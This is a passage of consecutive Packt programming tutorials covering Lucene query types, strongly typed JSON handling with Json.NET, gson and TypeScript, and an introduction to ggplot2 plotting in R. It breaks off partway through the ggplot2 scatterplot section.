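TopDocs topDocs = indexSearcher.search(query, 100);
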
Fuzzy query

Lucene's fuzzy search implementation is based on the Levenshtein distance. It compares two strings and finds the number of single-character changes that are needed to transform one string into another. The resulting number indicates the closeness of the two strings. In a fuzzy search, a threshold number of edits is used to determine whether the two strings are matched. To trigger a fuzzy match in QueryParser, you can use the tilde (~) character. There are a couple of configurations in QueryParser to tune this type of query. Here is a code snippet:

queryParser.setFuzzyMinSim(2f);
queryParser.setFuzzyPrefixLength(3);
Query query = queryParser.parse("hump~");

This example will return the first, second, and fourth sentences, as the fuzzy match matches hump to humpty because the two words differ by two characters. We tuned the fuzzy query to a minimum similarity of two in this example.

Lowercase expanded term

This configuration determines whether to automatically lowercase multiterm queries. An analyzer can do this already, so this is more like an overriding configuration that forces multiterm queries to be lowercased. Here is a code snippet:

queryParser.setLowercaseExpandedTerms(true);
Query query = queryParser.parse("\"Humpty Dumpty\"");

This code will lowercase our search string before the search execution.

Phrase slop

Phrase search can be tuned to allow some flexibility in phrase matching. By default, a phrase match is exact. Setting a slop value gives it some tolerance for terms that may not always be matched consecutively. Here is a code snippet that demonstrates this feature:

queryParser.setPhraseSlop(3);
Query query = queryParser.parse("\"Humpty Dumpty wall\"");

Without setting a phrase slop, the phrase Humpty Dumpty wall will not have any matches. By setting the phrase slop to three, it allows enough tolerance that this search now returns the first sentence. Go ahead and play around with this setting in order to get more familiar with its behavior.

TermQuery and TermRangeQuery

A TermQuery is a very simple query that matches documents containing a specific term. The TermRangeQuery is, as its name implies, a term range with a lower and upper boundary for matching.

How to do it...

Here are a couple of examples of TermQuery and TermRangeQuery:

query = new TermQuery(new Term("content", "humpty"));
query = new TermRangeQuery("content", new BytesRef("a"), new BytesRef("c"), true, true);

The first line is a simple query that matches the term humpty in the content field. The second line is a range query matching documents whose content terms sort between a and c.

BooleanQuery

A BooleanQuery is a combination of other queries in which you can specify whether each subquery must, must not, or should match. These options provide the foundation to build up the logical operators AND, OR, and NOT, which you can use in QueryParser. Here is a quick review of the QueryParser syntax for BooleanQuery:

- "+" means required; for example, the search string +humpty dumpty equates to must match humpty and should match dumpty
- "-" means must not match; for example, the search string -humpty dumpty equates to must not match humpty and should match dumpty
- AND, OR, and NOT are pseudo Boolean operators. Under the hood, Lucene uses BooleanClause.Occur to model these operators. The options for occur are MUST, MUST_NOT, and SHOULD. In an AND query, both terms must match. In an OR query, both terms should match. Lastly, in a NOT query, the term must not match (MUST_NOT).
For example, humpty AND dumpty means must match both humpty and dumpty, humpty OR dumpty means should match either or both of humpty and dumpty, and NOT humpty means the term humpty must not exist in a match.

As mentioned, the rudimentary clauses of BooleanQuery have three options: must match, must not match, and should match. These options allow us to programmatically create Boolean operations through an API.

How to do it...

Here is a code snippet that demonstrates BooleanQuery:

BooleanQuery query = new BooleanQuery();
query.add(new BooleanClause(new TermQuery(new Term("content", "humpty")), BooleanClause.Occur.MUST));
query.add(new BooleanClause(new TermQuery(new Term("content", "dumpty")), BooleanClause.Occur.MUST));
query.add(new BooleanClause(new TermQuery(new Term("content", "wall")), BooleanClause.Occur.SHOULD));
query.add(new BooleanClause(new TermQuery(new Term("content", "sat")), BooleanClause.Occur.MUST_NOT));

How it works…

In this demonstration, we use TermQuery to illustrate the building of BooleanClauses. It's equivalent to this logic: (humpty AND dumpty) OR wall NOT sat. This code will return the second sentence from our setup. Because of the last MUST_NOT BooleanClause on the word "sat", the first sentence is filtered from the results. Note that BooleanClause accepts two arguments: a Query and a BooleanClause.Occur. BooleanClause.Occur is where you specify the matching options: MUST, MUST_NOT, and SHOULD.

PrefixQuery and WildcardQuery

PrefixQuery, as the name implies, matches documents with terms starting with a specified prefix, while WildcardQuery allows you to use wildcard characters for wildcard matching. A PrefixQuery is essentially a WildcardQuery in which the only wildcard character is at the end of the search string. When doing a wildcard search in QueryParser, it returns either a PrefixQuery or a WildcardQuery, depending on the wildcard character's location. PrefixQuery is simpler and more efficient than WildcardQuery, so it's preferable to use PrefixQuery whenever possible. That's exactly what QueryParser does.

How to do it...

Here is a code snippet to demonstrate both Query types:

PrefixQuery query = new PrefixQuery(new Term("content", "hum"));
WildcardQuery query2 = new WildcardQuery(new Term("content", "*um*"));

How it works…

Both queries would return the same results from our setup. The PrefixQuery will match anything that starts with hum and the WildcardQuery will match anything that contains um.

PhraseQuery and MultiPhraseQuery

A PhraseQuery matches a particular sequence of terms, while a MultiPhraseQuery gives you the option to match multiple terms in the same position. For example, MultiPhraseQuery supports a phrase such as humpty (dumpty OR together), in which it matches humpty in position 0 and dumpty or together in position 1.

How to do it...

Here is a code snippet to demonstrate both Query types:

PhraseQuery query = new PhraseQuery();
query.add(new Term("content", "humpty"));
query.add(new Term("content", "together"));

MultiPhraseQuery query2 = new MultiPhraseQuery();
Term[] terms1 = new Term[1];
terms1[0] = new Term("content", "humpty");
Term[] terms2 = new Term[2];
terms2[0] = new Term("content", "dumpty");
terms2[1] = new Term("content", "together");
query2.add(terms1);
query2.add(terms2);

How it works…

The first Query, PhraseQuery, searches for the phrase humpty together. The second Query, MultiPhraseQuery, searches for the phrase humpty (dumpty OR together).
The first Query would return sentence four from our setup, while the second Query would return sentences one, two, and four. Note that in MultiPhraseQuery, multiple terms in the same position are added as an array.

FuzzyQuery

A FuzzyQuery matches terms based on similarity, using the Damerau-Levenshtein algorithm. We are not going into the details of the algorithm, as it is outside of our topic. What we need to know is that a fuzzy match is measured by the number of edits between terms. FuzzyQuery allows a maximum of 2 edits. For example, humptX is one edit away from humpty, and humpXX is two edits away. There is also a requirement that the number of edits must be less than the minimum term length (of either the input term or the candidate term). As another example, ab and abcd would not match because the number of edits between the two terms is 2, which is not less than the length of ab, which is also 2.

How to do it...

Here is a code snippet to demonstrate FuzzyQuery:

FuzzyQuery query = new FuzzyQuery(new Term("content", "humpXX"));

How it works…

This Query will return sentences one, two, and four from our setup, as humpXX matches humpty within two edits. In QueryParser, a FuzzyQuery can be triggered by the tilde (~) sign. An equivalent search string would be humpXX~.

Summary

This gives you a glimpse of the various querying and filtering features that have been proven to build successful search engines.

Resources for Article:

Further resources on this subject:

- Extending ElasticSearch with Scripting [article]
- Downloading and Setting Up ElasticSearch [article]
- Lucene.NET: Optimizing and merging index segments [article]

JSON with JSON.Net

Packt
25 Jun 2015
16 min read

In this article by Ray Rischpater, author of the book JavaScript JSON Cookbook, we show you how you can use strong typing in your applications with JSON using C#, Java, and TypeScript. You'll find the following recipes:

- How to deserialize an object using Json.NET
- How to handle date and time objects using Json.NET
- How to deserialize an object using gson for Java
- How to use TypeScript with Node.js
- How to annotate simple types using TypeScript
- How to declare interfaces using TypeScript
- How to declare classes with interfaces using TypeScript
- Using json2ts to generate TypeScript interfaces from your JSON

(For more resources related to this topic, see here.)

While some say that strong types are for weak minds, the truth is that strong typing in programming languages can help you avoid whole classes of errors in which you mistakenly assume that an object of one type is really of a different type. Languages such as C# and Java provide strong types for exactly this reason.

Fortunately, the JSON serializers for C# and Java support strong typing, which is especially handy once you've figured out your object representation and simply want to map JSON to instances of classes you've already defined. We use Json.NET for C# and gson for Java to convert from JSON to instances of classes you define in your application. Finally, we take a look at TypeScript, an extension of JavaScript that provides compile-time checking of types, compiling to plain JavaScript for use with Node.js and browsers. We'll look at how to install the TypeScript compiler for Node.js, how to use TypeScript to annotate types and interfaces, and how to use a web page by Timmy Kokke to automatically generate TypeScript interfaces from JSON objects.

How to deserialize an object using Json.NET

In this recipe, we show you how to use Newtonsoft's Json.NET to deserialize JSON to an object that's an instance of a class. We'll use Json.NET because, although this works with the existing .NET JSON serializer, there are other things that I want you to know about Json.NET, which we'll discuss in the next two recipes.

Getting ready

To begin, you need to be sure you have a reference to Json.NET in your project. The easiest way to do this is to use NuGet; launch NuGet, search for Json.NET, and click on Install. You'll also need a reference to the Newtonsoft.Json namespace in any file that needs those classes, with a using directive at the top of your file:

using Newtonsoft.Json;

How to do it…

Here's an example that provides the implementation of a simple class, converts a JSON string to an instance of that class, and then converts the instance back into JSON:

using System;
using Newtonsoft.Json;

namespace JSONExample
{
    public class Record
    {
        public string call;
        public double lat;
        public double lng;
    }

    class Program
    {
        static void Main(string[] args)
        {
            String json = @"{ 'call': 'kf6gpe-9',
            'lat': 21.9749, 'lng': 159.3686 }";

            var result = JsonConvert.DeserializeObject<Record>(
                json, new JsonSerializerSettings
                {
                    MissingMemberHandling = MissingMemberHandling.Error
                });
            Console.Write(JsonConvert.SerializeObject(result));

            return;
        }
    }
}

How it works…

In order to deserialize the JSON in a type-safe manner, we need to have a class that has the same fields as our JSON. The Record class, defined in the first few lines, does this, defining fields for call, lat, and lng. The Newtonsoft.Json namespace provides the JsonConvert class with the static methods SerializeObject and DeserializeObject. DeserializeObject is a generic method, taking the type of the object that should be returned as a type argument, and as arguments the JSON to parse and an optional argument indicating options for the JSON parsing. We pass the MissingMemberHandling property as a setting, indicating with the value of the enumeration Error that, in the event that a field is missing, the parser should throw an exception. After parsing the class, we convert it again to JSON and write the resulting JSON to the console.

There's more…

If you skip passing the MissingMemberHandling option or pass Ignore (the default), you can have mismatches between field names in your JSON and your class, which probably isn't what you want for type-safe conversion. You can also pass the NullValueHandling field with a value of Include or Ignore. If Include, fields with null values are included; if Ignore, fields with null values are ignored.

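As a rough sketch of how these settings combine (reusing the Record class above; the extra notes member and the chosen values are only for illustration), a more permissive configuration might look like this:

var settings = new JsonSerializerSettings
{
    MissingMemberHandling = MissingMemberHandling.Ignore, // tolerate JSON members the class lacks
    NullValueHandling = NullValueHandling.Ignore          // drop null-valued fields when serializing
};

var record = JsonConvert.DeserializeObject<Record>(
    @"{ 'call': 'kf6gpe-9', 'lat': 21.9749, 'lng': 159.3686, 'notes': null }", settings);
Console.Write(JsonConvert.SerializeObject(record, settings));
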
See also

The full documentation for Json.NET is at http://www.newtonsoft.com/json/help/html/Introduction.htm. Type-safe deserialization is also possible with JSON support using the .NET serializer; the syntax is similar. For an example, see the documentation for the JavaScriptSerializer class at https://msdn.microsoft.com/en-us/library/system.web.script.serialization.javascriptserializer(v=vs.110).aspx.

How to handle date and time objects using Json.NET

Dates in JSON are problematic because JavaScript's dates are in milliseconds from the epoch, which is generally unreadable to people. Different JSON parsers handle this differently; Json.NET has a nice IsoDateTimeConverter that formats the date and time in ISO format, making it human-readable for debugging or parsing on platforms other than JavaScript. You can extend this approach to convert any kind of formatted data in JSON attributes by creating new converter objects and using the converter object to convert from one value type to another.

How to do it…

Simply include a new IsoDateTimeConverter object when you call JsonConvert.SerializeObject, like this:

string json = JsonConvert.SerializeObject(p, new IsoDateTimeConverter());

How it works…

This causes the serializer to invoke the IsoDateTimeConverter instance for any instance of a date and time object, returning ISO strings like this in your JSON:

2015-07-29T08:00:00

There's more…

Note that this can be parsed by Json.NET, but not by JavaScript; in JavaScript, you'll want to use a function like this:

function isoDateReviver(value) {
    if (typeof value === 'string') {
        var a = /^(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2}):(\d{2}(?:\.\d*)?)(?:([+-])(\d{2}):(\d{2}))?Z?$/.exec(value);
        if (a) {
            var utcMilliseconds = Date.UTC(+a[1], +a[2] - 1, +a[3], +a[4], +a[5], +a[6]);
            return new Date(utcMilliseconds);
        }
    }
    return value;
}

The rather hairy regular expression on the third line matches dates in the ISO format, extracting each of the fields. If the regular expression finds a match, it extracts each of the date fields, which are then used by the Date class's UTC method to create a new date. Note that the entire regular expression (everything between the / characters) should be on one line with no whitespace. It's a little long for this page, however!

See also

For more information on how Json.NET handles dates and times, see the documentation and example at http://www.newtonsoft.com/json/help/html/SerializeDateFormatHandling.htm.

How to deserialize an object using gson for Java

Like Json.NET, gson provides a way to specify the destination class to which you're deserializing a JSON object.

Getting ready

You'll need to include the gson JAR file in your application, just as you would for any other external API.

How to do it…

You use the same fromJson method as you do for type-unsafe JSON parsing with gson, except that you pass the class object to gson as the second argument, like this:

// Assuming we have a class Record that looks like this:
/*
class Record {
    private String call;
    private float lat;
    private float lng;
    // public API would access these fields
}
*/

Gson gson = new com.google.gson.Gson();
String json = "{ \"call\": \"kf6gpe-9\", \"lat\": 21.9749, \"lng\": 159.3686 }";
Record result = gson.fromJson(json, Record.class);

How it works…

The fromJson method always takes a Java class. In the example in this recipe, we convert directly to a plain old Java object that our application can use without needing to use the dereferencing and type conversion interface of JsonElement that gson provides.

There's more…

The gson library can also deal with nested types and arrays. You can also hide fields from being serialized or deserialized by declaring them transient, which makes sense because transient fields aren't serialized.

See also

The documentation for gson and its support for deserializing instances of classes is at https://sites.google.com/site/gson/gson-user-guide#TOC-Object-Examples.

How to use TypeScript with Node.js

Using TypeScript with Visual Studio is easy; it's just part of the installation of Visual Studio for any version after Visual Studio 2013 Update 2. Getting the TypeScript compiler for Node.js is almost as easy: it's an npm install away.

How to do it…

On a command line with npm in your path, run the following command:

npm install -g typescript

The npm option -g tells npm to install the TypeScript compiler globally, so it's available to every Node.js application you write. Once you run it, npm downloads and installs the TypeScript compiler binary for your platform.

There's more…

Once you run this command to install the compiler, you'll have the TypeScript compiler tsc available on the command line. Compiling a file with tsc is as easy as writing the source code, saving it in a file with the .ts extension, and running tsc on it. For example, given the following TypeScript saved in the file hello.ts:

function greeter(person: string) {
    return "Hello, " + person;
}

var user: string = "Ray";

console.log(greeter(user));

Running tsc hello.ts at the command line creates the following JavaScript:

function greeter(person) {
    return "Hello, " + person;
}

var user = "Ray";

console.log(greeter(user));

Try it! As we'll see in the next section, the function declaration for greeter contains a single TypeScript annotation; it declares the argument person to be a string. Add the following line to the bottom of hello.ts:

console.log(greeter(2));

Now, run tsc hello.ts again; you'll get an error like this one:

C:\Users\rarischp\Documents\node.js\typescript\hello.ts(8,13): error TS2082: Supplied parameters do not match any signature of call target:
        Could not apply type 'string' to argument 1 which is of type 'number'.
C:\Users\rarischp\Documents\node.js\typescript\hello.ts(8,13): error TS2087: Could not select overload for 'call' expression.

This error indicates that I'm attempting to call greeter with a value of the wrong type, passing a number where greeter expects a string.
In the next recipe, we'll look at the kinds of type annotations TypeScript supports for simple types.

See also

The TypeScript home page, with tutorials and reference documentation, is at http://www.typescriptlang.org/.

How to annotate simple types using TypeScript

Type annotations with TypeScript are simple decorators appended to the variable or function after a colon. There is support for the same primitive types as in JavaScript, as well as for declaring interfaces and classes, which we will discuss next.

How to do it…

Here's a simple example of some variable declarations and two function declarations:

function greeter(person: string): string {
  return "Hello, " + person;
}

function circumference(radius: number): number {
  var pi: number = 3.141592654;
  return 2 * pi * radius;
}

var user: string = "Ray";

console.log(greeter(user));
console.log("You need " + circumference(2) + " meters of fence for your dog.");

This example shows how to annotate functions and variables.

How it works…

Variables, either standalone or as arguments to a function, are decorated using a colon and then the type. For example, the first function, greeter, takes a single argument, person, which must be a string. The second function, circumference, takes a radius, which must be a number, and declares a single variable in its scope, pi, which must be a number and has the value 3.141592654. You declare functions in the normal way as in JavaScript, and then add the return type annotation after the argument list, again using a colon and the type. So, greeter returns a string, and circumference returns a number.

There's more…

TypeScript defines the following fundamental type decorators, which map to their underlying JavaScript types:

array: This is a composite type. For example, you can write a list of strings as follows:
var list: string[] = ["one", "two", "three"];

boolean: This type decorator can contain the values true and false.

number: This type decorator, like numbers in JavaScript itself, can be any floating-point number.

string: This type decorator is a character string.

enum: An enumeration, written with the enum keyword, like this:
enum Color { Red = 1, Green, Blue };
var c: Color = Color.Blue;

any: This type indicates that the variable may be of any type.

void: This type indicates that the value has no type. You'll use void to indicate a function that returns nothing.

See also

For a list of the TypeScript types, see the TypeScript handbook at http://www.typescriptlang.org/Handbook.

How to declare interfaces using TypeScript

An interface defines how something behaves, without defining the implementation. In TypeScript, an interface names a complex type by describing the fields it has. This is known as structural subtyping.

How to do it…

Declaring an interface is a little like declaring a structure or class; you define the fields in the interface, each with its own type, like this:

interface Record {
  call: string;
  lat: number;
  lng: number;
}

function printLocation(r: Record) {
  console.log(r.call + ': ' + r.lat + ', ' + r.lng);
}

var myObj = {call: 'kf6gpe-7', lat: 21.9749, lng: 159.3686};

printLocation(myObj);

How it works…

The interface keyword in TypeScript defines an interface; as I already noted, an interface consists of the fields it declares with their types. In this listing, I defined a plain JavaScript object, myObj, and then called the function printLocation, defined previously, which takes a Record.
When calling printLocation with myObj, the TypeScript compiler checks the object's fields and their types, and only permits a call to printLocation if the object matches the interface.

There's more…

Beware! TypeScript can only provide compile-time checking. What do you think the following code does?

interface Record {
  call: string;
  lat: number;
  lng: number;
}

function printLocation(r: Record) {
  console.log(r.call + ': ' + r.lat + ', ' + r.lng);
}

var myObj = {call: 'kf6gpe-7', lat: 21.9749, lng: 159.3686};
printLocation(myObj);

var json = '{"call":"kf6gpe-7","lat":21.9749}';
var myOtherObj = JSON.parse(json);
printLocation(myOtherObj);

First, this compiles with tsc just fine. When you run it with node, you'll see the following:

kf6gpe-7: 21.9749, 159.3686
kf6gpe-7: 21.9749, undefined

What happened? The TypeScript compiler does not add run-time type checking to your code, so you can't impose an interface on a run-time created object that's not a literal. In this example, because the lng field is missing from the JSON, the function can't print it, and prints the value undefined instead.

This doesn't mean that you shouldn't use TypeScript with JSON, however. Type annotations serve a purpose for all readers of the code, be they compilers or people. You can use type annotations to indicate your intent as a developer, and readers of the code can better understand the design and limitations of the code you write.

See also

For more information about interfaces, see the TypeScript documentation at http://www.typescriptlang.org/Handbook#interfaces.

How to declare classes with interfaces using TypeScript

Interfaces let you specify behavior without specifying implementation; classes let you encapsulate implementation details behind an interface. TypeScript classes can encapsulate fields or methods, just as classes in other languages.

How to do it…

Here's an example of our Record structure, this time as a class with an interface:

class RecordInterface {
  call: string;
  lat: number;
  lng: number;

  constructor(c: string, la: number, lo: number) {}
  printLocation() {}
}

class Record implements RecordInterface {
  call: string;
  lat: number;
  lng: number;

  constructor(c: string, la: number, lo: number) {
    this.call = c;
    this.lat = la;
    this.lng = lo;
  }

  printLocation() {
    console.log(this.call + ': ' + this.lat + ', ' + this.lng);
  }
}

var myObj: Record = new Record('kf6gpe-7', 21.9749, 159.3686);

myObj.printLocation();

How it works…

The interface keyword, again, defines an interface just as the previous section shows. The class keyword, which you haven't seen before, implements a class; the optional implements keyword indicates that this class implements the interface RecordInterface. Note that the class implementing the interface must have all of the same fields and methods that the interface prescribes; otherwise, it doesn't meet the requirements of the interface. As a result, our Record class includes fields for call, lat, and lng, with the same types as in the interface, as well as the methods constructor and printLocation. The constructor method is a special method called when you create a new instance of the class using new. Note that with classes, unlike regular objects, the correct way to create them is by using a constructor, rather than just building them up as a collection of fields and values. We do that on the second to last line of the listing, passing the constructor arguments as function arguments to the class constructor.
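One practical follow-up to the run-time caveat raised earlier in these recipes: since the compiler cannot protect you from malformed JSON at run time, a small hand-written check is a common workaround before treating parsed JSON as a Record. The isRecord function below is only an illustrative sketch, not part of TypeScript or of the earlier listings:

function isRecord(value: any): boolean {
    return !!value &&
        typeof value.call === 'string' &&
        typeof value.lat === 'number' &&
        typeof value.lng === 'number';
}

var parsed = JSON.parse('{"call":"kf6gpe-7","lat":21.9749}');
if (isRecord(parsed)) {
    printLocation(parsed);   // safe: every field the interface expects is present
} else {
    console.log('Not a Record: ' + JSON.stringify(parsed));
}

The check costs a few lines, but it restores at run time the guarantee that the interface only gives you at compile time.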
See also There's a lot more you can do with classes, including defining inheritance and creating public and private fields and methods. For more information about classes in TypeScript, see the documentation at http://www.typescriptlang.org/Handbook#classes. Using json2ts to generate TypeScript interfaces from your JSON This last recipe is more of a tip than a recipe; if you've got some JSON you developed using another programming language or by hand, you can easily create a TypeScript interface for objects to contain the JSON by using Timmy Kokke's json2ts website. How to do it… Simply go to http://json2ts.com and paste your JSON in the box that appears, and click on the generate TypeScript button. You'll be rewarded with a second text-box that appears and shows you the definition of the TypeScript interface, which you can save as its own file and include in your TypeScript applications. How it works… The following figure shows a simple example: You can save this typescript as its own file, a definition file, with the suffix .d.ts, and then include the module with your TypeScript using the import keyword, like this: import module = require('module'); Summary In this article we looked at how you can adapt the type-free nature of JSON with the type safety provided by languages such as C#, Java, and TypeScript to reduce programming errors in your application. Resources for Article: Further resources on this subject: Playing with Swift [article] Getting Started with JSON [article] Top two features of GSON [article]
Introduction to ggplot2 and the plotting environments in R

Packt
25 Jun 2015
15 min read
In this article by Donato Teutonico, author of the book ggplot2 Essentials, we are going to explore different plotting environments in R and subsequently learn about the package, ggplot2. R provides a complete series of options available for realizing graphics, which make this software quite advanced concerning data visualization. The core of the graphics visualization in R is within the package grDevices, which provides the basic structure of data plotting, as for instance the colors and fonts used in the plots. Such graphic engine was then used as starting point in the development of more advanced and sophisticated packages for data visualization; the most commonly used being graphics and grid. (For more resources related to this topic, see here.) The graphics package is often referred to as the base or traditional graphics environment, since historically it was already available among the default packages delivered with the base installation of R and it provides functions that allow to the generation of complete plots. The grid package developed by Paul Murrell, on the other side, provides an alternative set of graphics tools. This package does not provide directly functions that generate complete plots, so it is not frequently used directly for generating graphics, but it was used in the development of advanced data visualization packages. Among the grid-based packages, the most widely used are lattice and ggplot2, although they are built implementing different visualization approaches. In fact lattice was build implementing the Trellis plots, while ggplot2 was build implementing the grammar of graphics. A diagram representing the connections between the tools just mentioned is represented in the Figure 1. Figure 1: Overview of the most widely used R packages for graphics Just keep in mind that this is not a complete overview of the packages available, but simply a small snapshot on the main packages used for data visualization in R, since many other packages are built on top of the tools just mentioned. If you would like to get a more complete overview of the graphics tools available in R, you may have a look at the web page of the R project summarizing such tools, http://cran.r-project.org/web/views/Graphics.html. ggplot2 and the Grammar of Graphics The package ggplot2 was developed by Hadley Wickham by implementing a completely different approach to statistical plots. As in the case of lattice, this package is also based on grid, providing a series of high-level functions which allow the creation of complete plots. The ggplot2 package provides an interpretation and extension of the principles of the book The Grammar of Graphics by Leland Wilkinson. Briefly, the Grammar of Graphics assumes that a statistical graphic is a mapping of data to aesthetic attributes and geometric objects used to represent the data, like points, lines, bars, and so on. Together with the aesthetic attributes, the plot can also contain statistical transformation or grouping of the data. As in lattice, also in ggplot2 we have the possibility to split data by a certain variable obtaining a representation of each subset of data in an independent sub-plot; such representation in ggplot2 is called faceting. In a more formal way, the main components of the grammar of graphics are: the data and their mapping, the aesthetic, the geometric objects, the statistical transformations, scales, coordinates and faceting. 
A more detailed description of these elements is provided along the book ggplot2 Essentials, but this is a summary of the general principles The data that must be visualized are mapped to aesthetic attributes which define how the data should be perceived The geometric objects describe what is actually represented on the plot like lines, points, or bars; the geometric objects basically define which kind of plot you are going to draw The statistical transformations are transformations which are applied to the data to group them; an example of statistical transformations would be, for instance, the smooth line or the regression lines of the previous examples or the binning of the histograms. Scales represent the connection between the aesthetic spaces with the actual values which should be represented. Scales maybe also be used to draw legends The coordinates represent the coordinate system in which the data are drawn The faceting, which we have already mentioned, is a grouping of data in subsets defined by a value of one variable In ggplot2 there are two main high-level functions, capable of creating directly creating a plot, qplot() and ggplot(); qplot() stands for quick plot and it is a simple function with serve a similar purpose to the plot() function in graphics. The function ggplot() on the other side is a much more advanced function which allow the user to have a deep control of the plot layout and details. In this article we will see some examples of qplot() in order to provide you with a taste of the typical plots which can be realized with ggplot2, but for more advanced data visualization the function ggplot(), is much more flexible. If you have a look on the different forums of R programming, there is quite some discussion about which of these two functions would be more convenient to use. My general recommendation would be that it depends on the type of graph you are drawing more frequently. For simple and standard plot, where basically only the data should be represented and some minor modification of standard layout, the qplot() function will do the job. On the other side, if you would need to apply particular transformations to the data or simply if you would like to keep the freedom of controlling and defining the different details of the plot layout, I would recommend to focus in learning the code of ggplot(). In the code below you will see an example of plot realized with ggplot2 where you can identify some of the components of the grammar of graphics. The example is realized with the function ggplot() which allow a more direct comparison with the grammar, but just below you may also find the corresponding code for the use of qplot(). Both codes generate the graph depicted on Figure 2. 
require(ggplot2) ## Load ggplot2 data(Orange) # Load the data   ggplot(data=Orange,    ## Data used aes(x=circumference,y=age, color=Tree))+  ##mapping to aesthetic geom_point()+      ##Add geometry (plot with data points) stat_smooth(method="lm",se=FALSE) ##Add statistics(linear regression)   ### Corresponding code with qplot() qplot(circumference,age,data=Orange, ## Data used color=Tree, ## Aestetic mapping geom=c("point","smooth"),method="lm",se=FALSE) This simple example can give you an idea of the role of each portion of code in a ggplot2 graph; you have seen how the main function body create the connection between the data and the aesthetic we are interested to represent and how, on top of this, you add the components of the plot like in this case the geometry element of points and the statistical element of regression. You can also notice how the components which need to be added to the main function call are included using the + sign. One more thing worth to mention at this point, is the if you run just the main body function in the ggplot() function, you will get an error message. This is because this call is not able to generate an actual plot. The step during which the plot is actually created is when you include the geometric attributes, in this case geom_point(). This is perfectly in line with the grammar of graphics, since as we have seen the geometry represent the actual connection between the data and what is represented on the plot. Is in fact at this stage that we specify we are interested in having points representing the data, before that nothing was specified yet about which plot we were interested in drawing. Figure 2: Example of plot of Orange dataset with ggplot2 The qplot() function The qplot (quick plot) function is a basic high level function of ggplot2. The general syntax that you should use with this function is the following qplot(x, y, data, colour, shape, size, facets, geom, stat) where x and y represent the variables to plot (y is optional with a default value NULL) data define the dataset containing the variables colour, shape and size are the aesthetic arguments that can be mapped on additional variables facets define the optional faceting of the plot based on one variable contained in the dataset geom allows you to select the actual visualization of the data, which basically will represent the plot which will be generated. Possible values are point, line or boxplot, but we will see several different examples in the next pages stat define the statistics to be used on the data These options represents the most important options available in qplot(). You may find a descriptions of the other function arguments in the help page of the function accessible with ?qplot, or on the ggplot2 website under the following link http://docs.ggplot2.org/0.9.3/qplot.html. Most of the options just discussed can be applied to different types of plots, since most of the concepts of the grammar of graphics, embedded in the code, may be translated from one plot to the other. For instance, you may use the argument colour to do an aesthetics mapping to one variable; these same concepts can in example be applied to scatterplots as well as histograms. Exactly the same principle would be applied to facets, which can be used for splitting plots independently on the type of plot considered. Histograms and density plots Histograms are plots used to explore how one (or more) quantitative variables are distributed. To show some examples of histograms we will use the iris data. 
This dataset contains measurements in centimetres of the variables sepal length and width and petal length and width for 50 flowers from each of three species of the flower iris: iris setosa, versicolor, and virginica. You may find more details running ?iris. The geometric attribute used to produce histograms is simply by specifying geom=”histogram” in the qplot() function. This default histogram will represent the variable specified on the x axis while the y axis will represent the number of elements in each bin. One other very useful way of representing distributions is to look at the kernel density function, which will basically produce a sort of continuous histogram instead of different bins by estimating the probability density function. For example let’s plot the petal length of all the three species of iris as histogram and density plot. data(iris)   ## Load data qplot(Petal.Length, data=iris, geom="histogram") ## Histogram qplot(Petal.Length, data=iris, geom="density")   ## Density plot The output of this code is showed in Figure 3. Figure 3: Histogram (left) and density plot (right) As you can see in both plots of Figure 3, it appears that the data are not distributed homogenously, but there are at least two distinct distribution clearly separated. This is very reasonably due to a different distribution for one of the iris species. To try to verify if the two distributions are indeed related to specie differences, we could generate the same plot using aesthetic attributes and have a different colour for each subtype of iris. To do this, we can simply map the fill to the Species column in the dataset; also in this case we can do that for the histogram and the density plot too. Below you may see the code we built, and in Figure 4 the resulting output. qplot(Petal.Length, data=iris, geom="histogram", colour=Species, fill=Species) qplot(Petal.Length, data=iris, geom="density", colour=Species, fill=Species) Figure 4: Histogram (left) and density plot (right) with aesthetic attribute for colour and fill In the distribution we can see that the lower data are coming from the Setosa species, while the two other distributions are partly overlapping. Scatterplots Scatterplots are probably the most common plot, since they are usually used to display the relationship between two quantitative variables. When two variables are provided, ggplot2 will make a scatterplot by default. For our example on how to build a scatterplot, we will use a dataset called ToothGrowth, which is available in the base R installation. In this dataset are reported measurements of teeth length of 10 guinea pig for three different doses of vitamin C (0.5, 1, and 2 mg) delivered in two different ways, as orange juice or as ascorbic acid (a compound having vitamin C activity). You can find, as usual, details on these data on the dataset help page at ?ToothGrowth. We are interested in seeing how the length of the teeth changed for the different doses. We are not able to distinguish among the different guinea pigs, since this information is not contained in the data, so for the moment we will plot just all the data we have. So let’s load the dataset and do a basic plot of the dose vs. length. require(ggplot2) data(ToothGrowth) qplot(dose, len, data=ToothGrowth, geom="point") ##Alternative coding qplot(dose, len, data=ToothGrowth) The resulting plot is reproduced in Figure 5. As you have seen, the default plot generated, also without a geom argument, is the scatter plot, which is the default bivariate plot type. 
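Before we refine this plot, it is worth noting, as an aside, roughly how the same basic scatterplot would be written with the ggplot() function mentioned at the beginning of the article; this is only an illustrative sketch, not code from the book:

ggplot(data=ToothGrowth,        ## Data used
  aes(x=dose, y=len)) +        ## Mapping to aesthetics
  geom_point()                  ## Geometry: draw the data as points

The output should match the default qplot() call above; the difference is that every additional component (colours, facets, smooth lines) is added explicitly with the + operator, which is what gives ggplot() its flexibility.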
In this plot we may have an idea of the tendency the data have, for instance we see that the teeth length increase by increasing the amount of vitamin C intake. On the other side, we know that there are two different subgroups in our data, since the vitamin C was provided in two different ways, as orange juice or as ascorbic acid, so it could be interesting to check if these two groups behave differently. Figure 5: Scatterplot of length vs. dose of ToothGrowth data The first approach could be to have the data in two different colours. To do that we simply need to assign the colour attribute to the column sup in the data, which defines the way of vitamin intake. The resulting plot is in Figure 6. qplot(dose, len,data=ToothGrowth, geom="point", col=supp) We now can distinguish from which intake route come each data in the plot and it looks like the data from orange juice shown are a little higher compared to ascorbic acid, but to differentiate between them it is not really easy. We could then try with the facets, so that the data will be completely separated in two different sub-plots. So let´s see what happens. Figure 6: Scatterplot of length vs. dose of ToothGrowth with data in different colours depending on vitamin intake. qplot(dose, len,data=ToothGrowth, geom="point", facets=.~supp) In this new plot, showed in Figure 7, we definitely have a better picture of the data, since we can see how the tooth growth differs for the different intakes. As you have seen, in this simple example, you will find that the best visualization may be different depending on the data you have. In some cases grouping a variable with colours or dividing the data with faceting may give you a different idea about the data and their tendency. For instance in our case with the plot in Figure 7 we can see that the way how the tooth growth increase with dose seems to be different for the different intake routes. Figure 7: Scatterplot of length vs. dose of ToothGrowth with faceting One approach to see the general tendency of the data could be to include a smooth line to the graph. In this case in fact we can see that the growth in the case of the orange juice does not looks really linear, so a smooth line could be a nice way to catch this. In order to do 